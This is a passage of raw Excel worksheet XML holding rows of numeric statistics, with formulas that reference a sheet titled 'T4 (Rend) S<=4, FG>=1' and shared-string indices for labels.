      </c>
      <c r="D9" s="281">
        <f>'T4 (Rend) S&lt;=4, FG&gt;=1'!D13</f>
        <v>13757167</v>
      </c>
      <c r="E9" s="281">
        <f>'T4 (Rend) S&lt;=4, FG&gt;=1'!E13</f>
        <v>13128811</v>
      </c>
      <c r="F9" s="281">
        <f>'T4 (Rend) S&lt;=4, FG&gt;=1'!F13</f>
        <v>13066562</v>
      </c>
      <c r="G9" s="281">
        <f>'T4 (Rend) S&lt;=4, FG&gt;=1'!G13</f>
        <v>26195373</v>
      </c>
      <c r="H9" s="281">
        <f>'T4 (Rend) S&lt;=4, FG&gt;=1'!H13</f>
        <v>6420</v>
      </c>
      <c r="I9" s="281">
        <f>'T4 (Rend) S&lt;=4, FG&gt;=1'!I13</f>
        <v>7505544</v>
      </c>
      <c r="J9" s="311">
        <f>'T4 (Rend) S&lt;=4, FG&gt;=1'!J13</f>
        <v>21256304</v>
      </c>
      <c r="K9" s="451">
        <f>'T4 (Rend) S&lt;=4, FG&gt;=1'!K13</f>
        <v>4421445</v>
      </c>
      <c r="L9" s="454">
        <f>'T4 (Rend) S&lt;=4, FG&gt;=1'!L13</f>
        <v>25704108</v>
      </c>
      <c r="M9" s="449">
        <f>'T4 (Rend) S&lt;=4, FG&gt;=1'!M13</f>
        <v>56932</v>
      </c>
      <c r="N9" s="454">
        <f>'T4 (Rend) S&lt;=4, FG&gt;=1'!N13</f>
        <v>56932</v>
      </c>
      <c r="O9" s="572"/>
      <c r="P9" s="572"/>
      <c r="Q9" s="572"/>
      <c r="S9" s="214"/>
    </row>
    <row r="10" spans="1:19" ht="16.5" customHeight="1" thickBot="1">
      <c r="A10" s="282" t="s">
        <v>4916</v>
      </c>
      <c r="B10" s="283">
        <f>'T4 (Rend) S&lt;=4, FG&gt;=1'!B18</f>
        <v>637.45381941876803</v>
      </c>
      <c r="C10" s="283">
        <f>'T4 (Rend) S&lt;=4, FG&gt;=1'!C18</f>
        <v>1033.9933574879226</v>
      </c>
      <c r="D10" s="283">
        <f>'T4 (Rend) S&lt;=4, FG&gt;=1'!D18</f>
        <v>743.99259099021151</v>
      </c>
      <c r="E10" s="283">
        <f>'T4 (Rend) S&lt;=4, FG&gt;=1'!E18</f>
        <v>34.263134956260309</v>
      </c>
      <c r="F10" s="283">
        <f>'T4 (Rend) S&lt;=4, FG&gt;=1'!F18</f>
        <v>67.752242582625556</v>
      </c>
      <c r="G10" s="283">
        <f>'T4 (Rend) S&lt;=4, FG&gt;=1'!G18</f>
        <v>45.723444735551368</v>
      </c>
      <c r="H10" s="283">
        <f>'T4 (Rend) S&lt;=4, FG&gt;=1'!H18</f>
        <v>3210</v>
      </c>
      <c r="I10" s="283">
        <f>'T4 (Rend) S&lt;=4, FG&gt;=1'!I18</f>
        <v>914.52954794687457</v>
      </c>
      <c r="J10" s="313">
        <f>'T4 (Rend) S&lt;=4, FG&gt;=1'!J18</f>
        <v>796.23554090500454</v>
      </c>
      <c r="K10" s="452">
        <f>'T4 (Rend) S&lt;=4, FG&gt;=1'!K18</f>
        <v>6.7415799721581404</v>
      </c>
      <c r="L10" s="457">
        <f>'T4 (Rend) S&lt;=4, FG&gt;=1'!L18</f>
        <v>12.99926416705987</v>
      </c>
      <c r="M10" s="453">
        <f>'T4 (Rend) S&lt;=4, FG&gt;=1'!M18</f>
        <v>2.2252257393251155E-2</v>
      </c>
      <c r="N10" s="457">
        <f>'T4 (Rend) S&lt;=4, FG&gt;=1'!N18</f>
        <v>1.1281142428683413E-2</v>
      </c>
      <c r="O10" s="572"/>
      <c r="P10" s="572"/>
      <c r="Q10" s="572"/>
      <c r="S10" s="214"/>
    </row>
    <row r="11" spans="1:19" ht="14.25" customHeight="1" thickTop="1">
      <c r="A11" s="734" t="s">
        <v>4461</v>
      </c>
      <c r="B11" s="735"/>
      <c r="C11" s="735"/>
      <c r="D11" s="735"/>
      <c r="E11" s="735"/>
      <c r="F11" s="735"/>
      <c r="G11" s="735"/>
      <c r="H11" s="735"/>
      <c r="I11" s="735"/>
      <c r="J11" s="735"/>
      <c r="K11" s="735"/>
      <c r="L11" s="735"/>
      <c r="M11" s="735"/>
      <c r="N11" s="736"/>
      <c r="O11" s="572"/>
      <c r="P11" s="572"/>
      <c r="Q11" s="572"/>
      <c r="S11" s="214"/>
    </row>
    <row r="12" spans="1:19" ht="14.25" customHeight="1">
      <c r="A12" s="448" t="s">
        <v>640</v>
      </c>
      <c r="B12" s="546">
        <v>0.343773</v>
      </c>
      <c r="C12" s="546">
        <v>0.66055699999999995</v>
      </c>
      <c r="D12" s="546">
        <v>0.68752500000000005</v>
      </c>
      <c r="E12" s="546">
        <v>0.80898300000000001</v>
      </c>
      <c r="F12" s="546">
        <v>0.85805500000000001</v>
      </c>
      <c r="G12" s="546">
        <v>0.91936700000000005</v>
      </c>
      <c r="H12" s="546">
        <v>9.5346E-2</v>
      </c>
      <c r="I12" s="546">
        <v>0.54771400000000003</v>
      </c>
      <c r="J12" s="547">
        <v>0.73233400000000004</v>
      </c>
      <c r="K12" s="548">
        <v>0.74466699999999997</v>
      </c>
      <c r="L12" s="549">
        <v>0.91943299999999994</v>
      </c>
      <c r="M12" s="550">
        <v>0.79771800000000004</v>
      </c>
      <c r="N12" s="549">
        <v>0.82571600000000001</v>
      </c>
      <c r="O12" s="214"/>
      <c r="S12" s="214"/>
    </row>
    <row r="13" spans="1:19" ht="36.75" customHeight="1">
      <c r="A13" s="22" t="s">
        <v>4150</v>
      </c>
      <c r="B13" s="260" t="s">
        <v>4307</v>
      </c>
      <c r="C13" s="260" t="s">
        <v>4467</v>
      </c>
      <c r="D13" s="260" t="s">
        <v>4468</v>
      </c>
      <c r="E13" s="260" t="s">
        <v>4543</v>
      </c>
      <c r="F13" s="260" t="s">
        <v>4544</v>
      </c>
      <c r="G13" s="260" t="s">
        <v>4545</v>
      </c>
      <c r="H13" s="260" t="s">
        <v>4130</v>
      </c>
      <c r="I13" s="260" t="s">
        <v>4546</v>
      </c>
      <c r="J13" s="312" t="s">
        <v>4547</v>
      </c>
      <c r="K13" s="436" t="s">
        <v>4548</v>
      </c>
      <c r="L13" s="437" t="s">
        <v>4808</v>
      </c>
      <c r="M13" s="315" t="s">
        <v>4809</v>
      </c>
      <c r="N13" s="437" t="s">
        <v>4810</v>
      </c>
      <c r="O13" s="262"/>
      <c r="S13" s="214"/>
    </row>
    <row r="14" spans="1:19" ht="25.5">
      <c r="A14" s="22" t="s">
        <v>4151</v>
      </c>
      <c r="B14" s="281">
        <v>12</v>
      </c>
      <c r="C14" s="281">
        <v>22</v>
      </c>
      <c r="D14" s="281">
        <v>34</v>
      </c>
      <c r="E14" s="281">
        <v>55</v>
      </c>
      <c r="F14" s="281">
        <v>58</v>
      </c>
      <c r="G14" s="281">
        <v>113</v>
      </c>
      <c r="H14" s="281">
        <v>1</v>
      </c>
      <c r="I14" s="281">
        <v>20</v>
      </c>
      <c r="J14" s="454">
        <v>53</v>
      </c>
      <c r="K14" s="449">
        <v>7</v>
      </c>
      <c r="L14" s="454">
        <v>81</v>
      </c>
      <c r="M14" s="449">
        <v>5</v>
      </c>
      <c r="N14" s="454">
        <v>9</v>
      </c>
      <c r="S14" s="214"/>
    </row>
    <row r="15" spans="1:19">
      <c r="A15" s="369" t="s">
        <v>4147</v>
      </c>
      <c r="B15" s="364">
        <v>0.1182</v>
      </c>
      <c r="C15" s="364">
        <v>0.43640000000000001</v>
      </c>
      <c r="D15" s="364">
        <v>0.47270000000000001</v>
      </c>
      <c r="E15" s="364">
        <v>0.65449999999999997</v>
      </c>
      <c r="F15" s="364">
        <v>0.73640000000000005</v>
      </c>
      <c r="G15" s="364">
        <v>0.84550000000000003</v>
      </c>
      <c r="H15" s="364">
        <v>9.1000000000000004E-3</v>
      </c>
      <c r="I15" s="364">
        <v>0.3</v>
      </c>
      <c r="J15" s="456">
        <v>0.53639999999999999</v>
      </c>
      <c r="K15" s="613" t="s">
        <v>4551</v>
      </c>
      <c r="L15" s="456" t="s">
        <v>4550</v>
      </c>
      <c r="M15" s="364" t="s">
        <v>4552</v>
      </c>
      <c r="N15" s="456" t="s">
        <v>4811</v>
      </c>
      <c r="S15" s="214"/>
    </row>
    <row r="16" spans="1:19">
      <c r="A16" s="369" t="s">
        <v>4457</v>
      </c>
      <c r="B16" s="281">
        <v>1449</v>
      </c>
      <c r="C16" s="281">
        <v>10347</v>
      </c>
      <c r="D16" s="281">
        <v>11796</v>
      </c>
      <c r="E16" s="281">
        <v>187011</v>
      </c>
      <c r="F16" s="281">
        <v>203930</v>
      </c>
      <c r="G16" s="281">
        <v>390874</v>
      </c>
      <c r="H16" s="281">
        <v>24</v>
      </c>
      <c r="I16" s="281">
        <v>10568</v>
      </c>
      <c r="J16" s="454">
        <v>22340</v>
      </c>
      <c r="K16" s="314">
        <f>K17+K18</f>
        <v>658132</v>
      </c>
      <c r="L16" s="449">
        <f t="shared" ref="L16:N16" si="1">L17+L18</f>
        <v>1153068</v>
      </c>
      <c r="M16" s="653">
        <f t="shared" si="1"/>
        <v>2559663</v>
      </c>
      <c r="N16" s="458">
        <f t="shared" si="1"/>
        <v>5048375</v>
      </c>
      <c r="O16" s="572"/>
      <c r="P16" s="572"/>
      <c r="Q16" s="572"/>
      <c r="S16" s="214"/>
    </row>
    <row r="17" spans="1:19">
      <c r="A17" s="369" t="s">
        <v>4455</v>
      </c>
      <c r="B17" s="281">
        <v>96</v>
      </c>
      <c r="C17" s="281">
        <v>4930</v>
      </c>
      <c r="D17" s="281">
        <v>5026</v>
      </c>
      <c r="E17" s="281">
        <v>175220</v>
      </c>
      <c r="F17" s="281">
        <v>191880</v>
      </c>
      <c r="G17" s="281">
        <v>367033</v>
      </c>
      <c r="H17" s="281">
        <v>1</v>
      </c>
      <c r="I17" s="281">
        <v>7927</v>
      </c>
      <c r="J17" s="454">
        <v>12952</v>
      </c>
      <c r="K17" s="314">
        <v>655817</v>
      </c>
      <c r="L17" s="454">
        <v>1143902</v>
      </c>
      <c r="M17" s="281">
        <v>2558449</v>
      </c>
      <c r="N17" s="454">
        <v>5046609</v>
      </c>
      <c r="O17" s="572"/>
      <c r="P17" s="572"/>
      <c r="Q17" s="572"/>
      <c r="S17" s="214"/>
    </row>
    <row r="18" spans="1:19">
      <c r="A18" s="369" t="s">
        <v>4456</v>
      </c>
      <c r="B18" s="281">
        <v>1353</v>
      </c>
      <c r="C18" s="281">
        <v>5417</v>
      </c>
      <c r="D18" s="281">
        <v>6770</v>
      </c>
      <c r="E18" s="281">
        <v>11791</v>
      </c>
      <c r="F18" s="281">
        <v>12050</v>
      </c>
      <c r="G18" s="281">
        <v>23841</v>
      </c>
      <c r="H18" s="281">
        <v>23</v>
      </c>
      <c r="I18" s="281">
        <v>2641</v>
      </c>
      <c r="J18" s="454">
        <v>9388</v>
      </c>
      <c r="K18" s="314">
        <v>2315</v>
      </c>
      <c r="L18" s="454">
        <v>9166</v>
      </c>
      <c r="M18" s="281">
        <v>1214</v>
      </c>
      <c r="N18" s="454">
        <v>1766</v>
      </c>
      <c r="O18" s="572"/>
      <c r="P18" s="572"/>
      <c r="Q18" s="572"/>
      <c r="S18" s="214"/>
    </row>
    <row r="19" spans="1:19" ht="13.5" thickBot="1">
      <c r="A19" s="282" t="s">
        <v>4916</v>
      </c>
      <c r="B19" s="283">
        <v>14.09375</v>
      </c>
      <c r="C19" s="283">
        <v>1.0987829614604463</v>
      </c>
      <c r="D19" s="283">
        <v>1.3469956227616395</v>
      </c>
      <c r="E19" s="283">
        <v>6.7292546512955145E-2</v>
      </c>
      <c r="F19" s="283">
        <v>6.2799666458203049E-2</v>
      </c>
      <c r="G19" s="283">
        <v>6.4956012129699509E-2</v>
      </c>
      <c r="H19" s="283">
        <v>23</v>
      </c>
      <c r="I19" s="283">
        <v>0.33316513182792984</v>
      </c>
      <c r="J19" s="457">
        <v>0.72483014206300189</v>
      </c>
      <c r="K19" s="459">
        <v>4.0000000000000001E-3</v>
      </c>
      <c r="L19" s="457">
        <v>0.1187</v>
      </c>
      <c r="M19" s="459">
        <v>4.0000000000000002E-4</v>
      </c>
      <c r="N19" s="457">
        <v>4.0000000000000002E-4</v>
      </c>
      <c r="O19" s="572"/>
      <c r="P19" s="572"/>
      <c r="Q19" s="572"/>
      <c r="S19" s="214"/>
    </row>
    <row r="20" spans="1:19" ht="14.25" customHeight="1" thickTop="1">
      <c r="A20" s="737" t="s">
        <v>4462</v>
      </c>
      <c r="B20" s="735"/>
      <c r="C20" s="735"/>
      <c r="D20" s="735"/>
      <c r="E20" s="735"/>
      <c r="F20" s="735"/>
      <c r="G20" s="735"/>
      <c r="H20" s="735"/>
      <c r="I20" s="735"/>
      <c r="J20" s="735"/>
      <c r="K20" s="735"/>
      <c r="L20" s="735"/>
      <c r="M20" s="735"/>
      <c r="N20" s="736"/>
      <c r="O20" s="572"/>
      <c r="P20" s="572"/>
      <c r="Q20" s="572"/>
      <c r="S20" s="214"/>
    </row>
    <row r="21" spans="1:19" ht="14.25" customHeight="1">
      <c r="A21" s="448" t="s">
        <v>640</v>
      </c>
      <c r="B21" s="546">
        <v>0.343773</v>
      </c>
      <c r="C21" s="546">
        <v>0.66054400000000002</v>
      </c>
      <c r="D21" s="546">
        <v>0.68751099999999998</v>
      </c>
      <c r="E21" s="546">
        <v>0.80895700000000004</v>
      </c>
      <c r="F21" s="546">
        <v>0.86328899999999997</v>
      </c>
      <c r="G21" s="546">
        <v>0.91929700000000003</v>
      </c>
      <c r="H21" s="546">
        <v>9.5346E-2</v>
      </c>
      <c r="I21" s="546">
        <v>0.61048800000000003</v>
      </c>
      <c r="J21" s="547">
        <v>0.76863800000000004</v>
      </c>
      <c r="K21" s="548">
        <v>0.74466699999999997</v>
      </c>
      <c r="L21" s="549">
        <v>0.93897399999999998</v>
      </c>
      <c r="M21" s="550">
        <v>0.79771000000000003</v>
      </c>
      <c r="N21" s="549">
        <v>0.825708</v>
      </c>
      <c r="O21" s="214"/>
      <c r="S21" s="214"/>
    </row>
    <row r="22" spans="1:19" ht="36.75" customHeight="1">
      <c r="A22" s="22" t="s">
        <v>4150</v>
      </c>
      <c r="B22" s="260" t="s">
        <v>4307</v>
      </c>
      <c r="C22" s="260" t="s">
        <v>4469</v>
      </c>
      <c r="D22" s="260" t="s">
        <v>4470</v>
      </c>
      <c r="E22" s="260" t="s">
        <v>4553</v>
      </c>
      <c r="F22" s="260" t="s">
        <v>4554</v>
      </c>
      <c r="G22" s="260" t="s">
        <v>4555</v>
      </c>
      <c r="H22" s="260" t="s">
        <v>4130</v>
      </c>
      <c r="I22" s="260" t="s">
        <v>4556</v>
      </c>
      <c r="J22" s="437" t="s">
        <v>4557</v>
      </c>
      <c r="K22" s="315" t="s">
        <v>4548</v>
      </c>
      <c r="L22" s="437" t="s">
        <v>4812</v>
      </c>
      <c r="M22" s="315" t="s">
        <v>4558</v>
      </c>
      <c r="N22" s="437" t="s">
        <v>4813</v>
      </c>
      <c r="O22" s="262"/>
      <c r="S22" s="214"/>
    </row>
    <row r="23" spans="1:19" ht="25.5">
      <c r="A23" s="22" t="s">
        <v>4151</v>
      </c>
      <c r="B23" s="281">
        <v>12</v>
      </c>
      <c r="C23" s="281">
        <v>18</v>
      </c>
      <c r="D23" s="281">
        <v>30</v>
      </c>
      <c r="E23" s="281">
        <v>46</v>
      </c>
      <c r="F23" s="281">
        <v>46</v>
      </c>
      <c r="G23" s="281">
        <v>92</v>
      </c>
      <c r="H23" s="281">
        <v>1</v>
      </c>
      <c r="I23" s="281">
        <v>13</v>
      </c>
      <c r="J23" s="454">
        <v>42</v>
      </c>
      <c r="K23" s="314">
        <v>7</v>
      </c>
      <c r="L23" s="454">
        <v>75</v>
      </c>
      <c r="M23" s="281">
        <v>3</v>
      </c>
      <c r="N23" s="454">
        <v>6</v>
      </c>
      <c r="S23" s="214"/>
    </row>
    <row r="24" spans="1:19">
      <c r="A24" s="369" t="s">
        <v>4147</v>
      </c>
      <c r="B24" s="364">
        <v>0.1182</v>
      </c>
      <c r="C24" s="364" t="s">
        <v>4305</v>
      </c>
      <c r="D24" s="364" t="s">
        <v>4306</v>
      </c>
      <c r="E24" s="364" t="s">
        <v>4549</v>
      </c>
      <c r="F24" s="364" t="s">
        <v>4559</v>
      </c>
      <c r="G24" s="364" t="s">
        <v>4550</v>
      </c>
      <c r="H24" s="364" t="s">
        <v>4141</v>
      </c>
      <c r="I24" s="364" t="s">
        <v>4308</v>
      </c>
      <c r="J24" s="456" t="s">
        <v>4309</v>
      </c>
      <c r="K24" s="613" t="s">
        <v>4551</v>
      </c>
      <c r="L24" s="456" t="s">
        <v>4560</v>
      </c>
      <c r="M24" s="364" t="s">
        <v>4552</v>
      </c>
      <c r="N24" s="456" t="s">
        <v>4811</v>
      </c>
      <c r="S24" s="214"/>
    </row>
    <row r="25" spans="1:19">
      <c r="A25" s="369" t="s">
        <v>4457</v>
      </c>
      <c r="B25" s="281">
        <v>1449</v>
      </c>
      <c r="C25" s="281">
        <v>13670</v>
      </c>
      <c r="D25" s="281">
        <v>15119</v>
      </c>
      <c r="E25" s="281">
        <v>193984</v>
      </c>
      <c r="F25" s="281">
        <v>212587</v>
      </c>
      <c r="G25" s="281">
        <v>406504</v>
      </c>
      <c r="H25" s="281">
        <v>24</v>
      </c>
      <c r="I25" s="281">
        <v>15273</v>
      </c>
      <c r="J25" s="454">
        <v>30368</v>
      </c>
      <c r="K25" s="314">
        <f>K26+K27</f>
        <v>658132</v>
      </c>
      <c r="L25" s="449">
        <f t="shared" ref="L25" si="2">L26+L27</f>
        <v>1157339</v>
      </c>
      <c r="M25" s="653">
        <f t="shared" ref="M25" si="3">M26+M27</f>
        <v>2561166</v>
      </c>
      <c r="N25" s="458">
        <f t="shared" ref="N25" si="4">N26+N27</f>
        <v>5050403</v>
      </c>
      <c r="O25" s="572"/>
      <c r="P25" s="572"/>
      <c r="Q25" s="572"/>
      <c r="S25" s="214"/>
    </row>
    <row r="26" spans="1:19">
      <c r="A26" s="369" t="s">
        <v>4455</v>
      </c>
      <c r="B26" s="281">
        <v>96</v>
      </c>
      <c r="C26" s="281">
        <v>4934</v>
      </c>
      <c r="D26" s="281">
        <v>5030</v>
      </c>
      <c r="E26" s="281">
        <v>175327</v>
      </c>
      <c r="F26" s="281">
        <v>191896</v>
      </c>
      <c r="G26" s="281">
        <v>367156</v>
      </c>
      <c r="H26" s="281">
        <v>1</v>
      </c>
      <c r="I26" s="281">
        <v>8140</v>
      </c>
      <c r="J26" s="454">
        <v>13169</v>
      </c>
      <c r="K26" s="314">
        <v>655817</v>
      </c>
      <c r="L26" s="454">
        <v>1143921</v>
      </c>
      <c r="M26" s="281">
        <v>2558450</v>
      </c>
      <c r="N26" s="454">
        <v>5046611</v>
      </c>
      <c r="O26" s="572"/>
      <c r="P26" s="572"/>
      <c r="Q26" s="572"/>
      <c r="S26" s="214"/>
    </row>
    <row r="27" spans="1:19">
      <c r="A27" s="369" t="s">
        <v>4456</v>
      </c>
      <c r="B27" s="281">
        <v>1353</v>
      </c>
      <c r="C27" s="281">
        <v>8736</v>
      </c>
      <c r="D27" s="281">
        <v>10089</v>
      </c>
      <c r="E27" s="281">
        <v>18657</v>
      </c>
      <c r="F27" s="281">
        <v>20691</v>
      </c>
      <c r="G27" s="281">
        <v>39348</v>
      </c>
      <c r="H27" s="281">
        <v>23</v>
      </c>
      <c r="I27" s="281">
        <v>7133</v>
      </c>
      <c r="J27" s="458">
        <v>17199</v>
      </c>
      <c r="K27" s="314">
        <v>2315</v>
      </c>
      <c r="L27" s="454">
        <v>13418</v>
      </c>
      <c r="M27" s="281">
        <v>2716</v>
      </c>
      <c r="N27" s="454">
        <v>3792</v>
      </c>
      <c r="O27" s="572"/>
      <c r="P27" s="572"/>
      <c r="Q27" s="572"/>
      <c r="S27" s="214"/>
    </row>
    <row r="28" spans="1:19" ht="13.5" thickBot="1">
      <c r="A28" s="282" t="s">
        <v>4916</v>
      </c>
      <c r="B28" s="283">
        <v>14.09375</v>
      </c>
      <c r="C28" s="283">
        <v>1.7705715443858938</v>
      </c>
      <c r="D28" s="283">
        <v>2.005765407554672</v>
      </c>
      <c r="E28" s="283">
        <v>0.10641258904789337</v>
      </c>
      <c r="F28" s="283">
        <v>0.10782402968274482</v>
      </c>
      <c r="G28" s="283">
        <v>0.10716970443081415</v>
      </c>
      <c r="H28" s="283">
        <v>23</v>
      </c>
      <c r="I28" s="283">
        <v>0.8762899262899263</v>
      </c>
      <c r="J28" s="283">
        <v>1.3060217176702862</v>
      </c>
      <c r="K28" s="368">
        <v>4.0000000000000001E-3</v>
      </c>
      <c r="L28" s="457">
        <v>0.19620000000000001</v>
      </c>
      <c r="M28" s="459">
        <v>8.0000000000000004E-4</v>
      </c>
      <c r="N28" s="457">
        <v>8.0000000000000004E-4</v>
      </c>
      <c r="O28" s="572"/>
      <c r="P28" s="572"/>
      <c r="Q28" s="572"/>
      <c r="S28" s="214"/>
    </row>
    <row r="29" spans="1:19" ht="14.25" customHeight="1" thickTop="1">
      <c r="A29" s="734" t="s">
        <v>4473</v>
      </c>
      <c r="B29" s="735"/>
      <c r="C29" s="735"/>
      <c r="D29" s="735"/>
      <c r="E29" s="735"/>
      <c r="F29" s="735"/>
      <c r="G29" s="735"/>
      <c r="H29" s="735"/>
      <c r="I29" s="735"/>
      <c r="J29" s="735"/>
      <c r="K29" s="735"/>
      <c r="L29" s="735"/>
      <c r="M29" s="735"/>
      <c r="N29" s="736"/>
      <c r="O29" s="572"/>
      <c r="P29" s="572"/>
      <c r="Q29" s="572"/>
      <c r="S29" s="214"/>
    </row>
    <row r="30" spans="1:19" ht="14.25" customHeight="1">
      <c r="A30" s="448" t="s">
        <v>640</v>
      </c>
      <c r="B30" s="546">
        <v>0.83422700000000005</v>
      </c>
      <c r="C30" s="546">
        <v>0.66202499999999997</v>
      </c>
      <c r="D30" s="546">
        <v>0.85246699999999997</v>
      </c>
      <c r="E30" s="546">
        <v>0.92910599999999999</v>
      </c>
      <c r="F30" s="546">
        <v>0.96182199999999995</v>
      </c>
      <c r="G30" s="546">
        <v>0.93877699999999997</v>
      </c>
      <c r="H30" s="546">
        <v>9.5341999999999996E-2</v>
      </c>
      <c r="I30" s="546">
        <v>0.680558</v>
      </c>
      <c r="J30" s="547">
        <v>0.87237500000000001</v>
      </c>
      <c r="K30" s="548">
        <v>0.75260199999999999</v>
      </c>
      <c r="L30" s="549">
        <v>0.863792</v>
      </c>
      <c r="M30" s="550">
        <v>0.83118000000000003</v>
      </c>
      <c r="N30" s="549">
        <v>0.83117399999999997</v>
      </c>
      <c r="O30" s="214"/>
      <c r="S30" s="214"/>
    </row>
    <row r="31" spans="1:19" ht="36.75" customHeight="1">
      <c r="A31" s="22" t="s">
        <v>4150</v>
      </c>
      <c r="B31" s="260" t="s">
        <v>4310</v>
      </c>
      <c r="C31" s="260" t="s">
        <v>4561</v>
      </c>
      <c r="D31" s="260" t="s">
        <v>4562</v>
      </c>
      <c r="E31" s="260" t="s">
        <v>4563</v>
      </c>
      <c r="F31" s="260" t="s">
        <v>4564</v>
      </c>
      <c r="G31" s="260" t="s">
        <v>4565</v>
      </c>
      <c r="H31" s="260" t="s">
        <v>4129</v>
      </c>
      <c r="I31" s="260" t="s">
        <v>4311</v>
      </c>
      <c r="J31" s="312" t="s">
        <v>4566</v>
      </c>
      <c r="K31" s="436" t="s">
        <v>4750</v>
      </c>
      <c r="L31" s="437" t="s">
        <v>4814</v>
      </c>
      <c r="M31" s="315" t="s">
        <v>4751</v>
      </c>
      <c r="N31" s="437" t="s">
        <v>4815</v>
      </c>
      <c r="O31" s="262" t="s">
        <v>1765</v>
      </c>
      <c r="S31" s="214"/>
    </row>
    <row r="32" spans="1:19" ht="25.5">
      <c r="A32" s="22" t="s">
        <v>4151</v>
      </c>
      <c r="B32" s="281">
        <v>5</v>
      </c>
      <c r="C32" s="281">
        <v>55</v>
      </c>
      <c r="D32" s="281">
        <v>60</v>
      </c>
      <c r="E32" s="281">
        <v>151</v>
      </c>
      <c r="F32" s="281">
        <v>168</v>
      </c>
      <c r="G32" s="281">
        <v>319</v>
      </c>
      <c r="H32" s="281">
        <v>0</v>
      </c>
      <c r="I32" s="281">
        <v>40</v>
      </c>
      <c r="J32" s="454">
        <v>100</v>
      </c>
      <c r="K32" s="449">
        <v>17</v>
      </c>
      <c r="L32" s="454">
        <v>117</v>
      </c>
      <c r="M32" s="449">
        <v>7</v>
      </c>
      <c r="N32" s="454">
        <v>14</v>
      </c>
      <c r="S32" s="214"/>
    </row>
    <row r="33" spans="1:19">
      <c r="A33" s="369" t="s">
        <v>4147</v>
      </c>
      <c r="B33" s="364">
        <v>0.72729999999999995</v>
      </c>
      <c r="C33" s="364">
        <v>0.46360000000000001</v>
      </c>
      <c r="D33" s="364">
        <v>0.8</v>
      </c>
      <c r="E33" s="364">
        <v>0.94550000000000001</v>
      </c>
      <c r="F33" s="364">
        <v>1</v>
      </c>
      <c r="G33" s="364">
        <v>1</v>
      </c>
      <c r="H33" s="364">
        <v>9.1000000000000004E-3</v>
      </c>
      <c r="I33" s="364">
        <v>0.5091</v>
      </c>
      <c r="J33" s="456">
        <v>0.88180000000000003</v>
      </c>
      <c r="K33" s="613" t="s">
        <v>4745</v>
      </c>
      <c r="L33" s="456" t="s">
        <v>4816</v>
      </c>
      <c r="M33" s="364" t="s">
        <v>4655</v>
      </c>
      <c r="N33" s="456" t="s">
        <v>4655</v>
      </c>
      <c r="S33" s="214"/>
    </row>
    <row r="34" spans="1:19">
      <c r="A34" s="369" t="s">
        <v>4457</v>
      </c>
      <c r="B34" s="281">
        <v>8632952</v>
      </c>
      <c r="C34" s="281">
        <v>4646033</v>
      </c>
      <c r="D34" s="281">
        <v>13278985</v>
      </c>
      <c r="E34" s="281">
        <v>12625181</v>
      </c>
      <c r="F34" s="281">
        <v>12768915</v>
      </c>
      <c r="G34" s="281">
        <v>25390971</v>
      </c>
      <c r="H34" s="281">
        <v>6422</v>
      </c>
      <c r="I34" s="281">
        <v>7134370</v>
      </c>
      <c r="J34" s="454">
        <v>20406946</v>
      </c>
      <c r="K34" s="314">
        <f>K35+K36</f>
        <v>5070202</v>
      </c>
      <c r="L34" s="449">
        <f t="shared" ref="L34" si="5">L35+L36</f>
        <v>24543332</v>
      </c>
      <c r="M34" s="653">
        <f t="shared" ref="M34" si="6">M35+M36</f>
        <v>2564033</v>
      </c>
      <c r="N34" s="458">
        <f t="shared" ref="N34" si="7">N35+N36</f>
        <v>5055245</v>
      </c>
      <c r="O34" s="572"/>
      <c r="P34" s="572"/>
      <c r="Q34" s="572"/>
      <c r="S34" s="214"/>
    </row>
    <row r="35" spans="1:19">
      <c r="A35" s="369" t="s">
        <v>4455</v>
      </c>
      <c r="B35" s="281">
        <v>13523</v>
      </c>
      <c r="C35" s="281">
        <v>4968</v>
      </c>
      <c r="D35" s="281">
        <v>18491</v>
      </c>
      <c r="E35" s="281">
        <v>383176</v>
      </c>
      <c r="F35" s="281">
        <v>192858</v>
      </c>
      <c r="G35" s="281">
        <v>572909</v>
      </c>
      <c r="H35" s="281">
        <v>2</v>
      </c>
      <c r="I35" s="281">
        <v>8207</v>
      </c>
      <c r="J35" s="454">
        <v>26696</v>
      </c>
      <c r="K35" s="314">
        <v>655847</v>
      </c>
      <c r="L35" s="454">
        <v>1977351</v>
      </c>
      <c r="M35" s="281">
        <v>2558482</v>
      </c>
      <c r="N35" s="458">
        <v>5046652</v>
      </c>
      <c r="O35" s="572"/>
      <c r="P35" s="572"/>
      <c r="Q35" s="572"/>
      <c r="S35" s="214"/>
    </row>
    <row r="36" spans="1:19">
      <c r="A36" s="369" t="s">
        <v>4456</v>
      </c>
      <c r="B36" s="281">
        <v>8619429</v>
      </c>
      <c r="C36" s="281">
        <v>4641065</v>
      </c>
      <c r="D36" s="281">
        <v>13260494</v>
      </c>
      <c r="E36" s="281">
        <v>12242005</v>
      </c>
      <c r="F36" s="281">
        <v>12576057</v>
      </c>
      <c r="G36" s="281">
        <v>24818062</v>
      </c>
      <c r="H36" s="281">
        <v>6420</v>
      </c>
      <c r="I36" s="281">
        <v>7126163</v>
      </c>
      <c r="J36" s="454">
        <v>20380250</v>
      </c>
      <c r="K36" s="314">
        <v>4414355</v>
      </c>
      <c r="L36" s="454">
        <v>22565981</v>
      </c>
      <c r="M36" s="281">
        <v>5551</v>
      </c>
      <c r="N36" s="454">
        <v>8593</v>
      </c>
      <c r="O36" s="572"/>
      <c r="P36" s="572"/>
      <c r="Q36" s="572"/>
      <c r="S36" s="214"/>
    </row>
    <row r="37" spans="1:19" ht="13.5" thickBot="1">
      <c r="A37" s="282" t="s">
        <v>4916</v>
      </c>
      <c r="B37" s="283">
        <v>637.39029801079641</v>
      </c>
      <c r="C37" s="283">
        <v>934.19182769726251</v>
      </c>
      <c r="D37" s="283">
        <v>717.13233464928885</v>
      </c>
      <c r="E37" s="283">
        <v>31.948778107188343</v>
      </c>
      <c r="F37" s="283">
        <v>65.208894627134995</v>
      </c>
      <c r="G37" s="283">
        <v>43.319378819323838</v>
      </c>
      <c r="H37" s="283">
        <v>3210</v>
      </c>
      <c r="I37" s="283">
        <v>868.30303399536979</v>
      </c>
      <c r="J37" s="457">
        <v>763.41961342523223</v>
      </c>
      <c r="K37" s="459">
        <v>6.7557999999999998</v>
      </c>
      <c r="L37" s="457">
        <v>11.483499999999999</v>
      </c>
      <c r="M37" s="459">
        <v>1.4E-3</v>
      </c>
      <c r="N37" s="457">
        <v>1.6999999999999999E-3</v>
      </c>
      <c r="O37" s="572"/>
      <c r="P37" s="572"/>
      <c r="Q37" s="572"/>
      <c r="S37" s="214"/>
    </row>
